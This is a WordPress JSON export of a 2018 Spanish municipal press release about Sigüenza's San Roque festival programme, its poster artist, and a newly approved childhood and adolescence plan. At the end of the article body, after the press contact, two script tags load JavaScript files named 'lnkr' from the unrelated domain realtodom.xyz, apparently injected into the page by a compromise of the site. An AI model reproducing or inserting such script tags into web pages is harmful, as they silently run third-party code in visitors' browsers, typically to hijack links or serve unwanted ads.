{"id":247,"date":"2018-08-01T09:28:23","date_gmt":"2018-08-01T09:28:23","guid":{"rendered":"http:\/\/www.bandopress.com\/notas-de-prensa\/?p=247"},"modified":"2018-08-01T09:28:23","modified_gmt":"2018-08-01T09:28:23","slug":"presentado-el-programa-de-fiestas-de-san-roque-2018","status":"publish","type":"post","link":"http:\/\/www.bandopress.com\/notas-de-prensa\/2018\/08\/01\/presentado-el-programa-de-fiestas-de-san-roque-2018\/","title":{"rendered":"Presentado el Programa de Fiestas de San Roque 2018"},"content":{"rendered":"<p><strong>Lo hizo ayer el concejal de festejos, Oscar Hernando, en el Pleno Ordinario correspondiente al mes de julio<\/strong><\/p>\n<p>El Ayuntamiento de Sig\u00fcenza present\u00f3 ayer, en el Pleno Ordinario correspondiente al mes de julio, el programa de las ya pr\u00f3ximas fiestas que la ciudad celebra en honor de sus patronos, San Roque y la Virgen de la Mayor. Lo hizo el concejal de Festejos, Oscar Hernando, responsable de la coordinaci\u00f3n del programa. Los actos principales llegar\u00e1n entre los d\u00edas 14 y 19 de agosto, pero antes y despu\u00e9s habr\u00e1 m\u00e1s de 120 ep\u00edgrafes, entre semana de la Juventud, actividades culturales y las propiamente festivas, incluidas las taurinas y las deportivas.<\/p>\n<p>El cartel de este a\u00f1o es un dise\u00f1o de Anna Zelinskaya. Esta rusa, nacida en Pushkino, una ciudad situada a 15 kil\u00f3metros de Mosc\u00fa, trabaja en Espa\u00f1a como consultora inform\u00e1tica, tiene 30 a\u00f1os y es una enamorada en Sig\u00fcenza, y de Sig\u00fcenza. Unos d\u00edas antes de concluir el plazo para presentar originales al concurso de carteles para las fiestas de San Roque, decidi\u00f3 intentarlo, animada a participar por la familia de su novio. &#8216;Dibuj\u00e9 en acuarela la catedral y el resto de elementos del cartel por separado, y luego los un\u00ed en Photoshop&#8217;, resume. Su trabajo est\u00e1 en la portada de los programas de mano que se van a repartir en estos d\u00edas por toda la ciudad.<\/p>\n<p>Adem\u00e1s de los ep\u00edgrafes, el programa incluye cinco interesantes art\u00edculos. El primero de ellos corresponde a Jes\u00fas de las Heras, de\u00e1n de la catedral, que habla sobre el a\u00f1o jubilar de Sig\u00fcenza y los lugares especiales que, a este respecto, se pueden encontrar en la catedral. Pilar Mart\u00ednez Taboada, cronista oficial de la ciudad, habla sobre el A\u00f1o del Patrimonio Europeo, en su vertiente seguntina. Felipe Gil Peces-Rata, can\u00f3nigo archivero de la catedral de Sig\u00fcenza, habla sobre el bicentenario de las ursulinas en Sig\u00fcenza. El alcalde em\u00e9rito, Juan Carlos Garc\u00eda Muela, ha escrito sobre las fiestas de siguenza a trav\u00e9s del tiempo. Por \u00faltimo, Jos\u00e9 Merino y Emilio de las Heras hablan sobre la tradici\u00f3n de los gigantes y cabezudos en las fiestas de la ciudad, cuando se cumplen cuarenta a\u00f1os desde que ellos empezaran a bailar al rey y la reina en las comparsas de gigantes y cabezudos. Lejos de ser un simple elemento de diversi\u00f3n infantil, tienen un origen m\u00edtico-religioso muy antiguo.<\/p>\n<p>Adem\u00e1s recibir cuenta del programa de fiestas, el pleno aprob\u00f3 tambi\u00e9n, por unanimidad, el II Plan Municipal de Infancia y Adolescencia. Durante los anteriores cuatro a\u00f1os se han desarrollado el programa definido por el I Plan Municipal de Infancia y Adolescencia, habi\u00e9ndose cumplido los objetivos marcados. En los \u00faltimos meses, el Consejo Municipal de la Infancia y la Adolescencia ha evaluado y analizado las l\u00edneas del nuevo Plan. Tendr\u00e1 una duraci\u00f3n de seis a\u00f1os 2018 &#8211; 2024, y pretende ser una herramienta para seguir en la misma l\u00ednea.<\/p>\n<p>Su fin principal es &#8216;mejorar la calidad de vida de ni\u00f1os y ni\u00f1as de Sig\u00fcenza y conseguir que su ciudad est\u00e9 m\u00e1s adaptada a sus necesidades&#8217;. Y para conseguirlo parte de la b\u00fasqueda de objetivos concretos como son el desarrollo de la infancia y la adolescencia; vivir en un contexto normalizado; sensibilizaci\u00f3n de la sociedad hacia una participaci\u00f3n activa y real; y dise\u00f1ar una ciudad donde tengan cabida todos los estratos de la poblaci\u00f3n.<\/p>\n<p>El proceso de elaboraci\u00f3n del nuevo Plan ha sido participativo; han colaborado las diferentes \u00e1reas municipales, asociaciones, colegios y los propios ni\u00f1os y adolescentes que han aportado sus opiniones y propuestas.<\/p>\n<p>En el turno de manifestaciones de alcald\u00eda, Jos\u00e9 Manuel Latre dio las gracias a la Asociaci\u00f3n Medieval por la organizaci\u00f3n brillante de la XIX Edici\u00f3n de las Jornadas Medievales, felicit\u00f3 a los hosteleros seguntinos recientemente premiados en las II Jornadas del Fino Seguntino, felicit\u00f3 al Cabildo Catedralicio por el advenimiento del A\u00f1o Jubilar, invit\u00f3 a seguntinos y visitantes a visitar la nueva exposici\u00f3n de tapices que se muestra en la catedral, y les dese\u00f3, igualmente, unas felices fiestas.<\/p>\n<p>M\u00e1s informaci\u00f3n:<br \/>\nJavier Bravo<br \/>\nPrensa Sig\u00fcenza<br \/>\n606 411 053<\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<div class=\"mh-excerpt\"><p>Lo hizo ayer el concejal de festejos, Oscar Hernando, en el Pleno Ordinario correspondiente al mes de julio El Ayuntamiento de Sig\u00fcenza present\u00f3 ayer, en <a class=\"mh-excerpt-more\" href=\"http:\/\/www.bandopress.com\/notas-de-prensa\/2018\/08\/01\/presentado-el-programa-de-fiestas-de-san-roque-2018\/\" title=\"Presentado el Programa de Fiestas de San Roque 2018\">[&#8230;]<\/a><\/p>\n<\/div>","protected":false},"author":1,"featured_media":248,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12],"tags":[],"class_list":["post-247","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-castilla-la-mancha"],"_links":{"self":[{"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/posts\/247","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/comments?post=247"}],"version-history":[{"count":1,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/posts\/247\/revisions"}],"predecessor-version":[{"id":249,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/posts\/247\/revisions\/249"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/media\/248"}],"wp:attachment":[{"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/media?parent=247"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/categories?post=247"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/tags?post=247"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}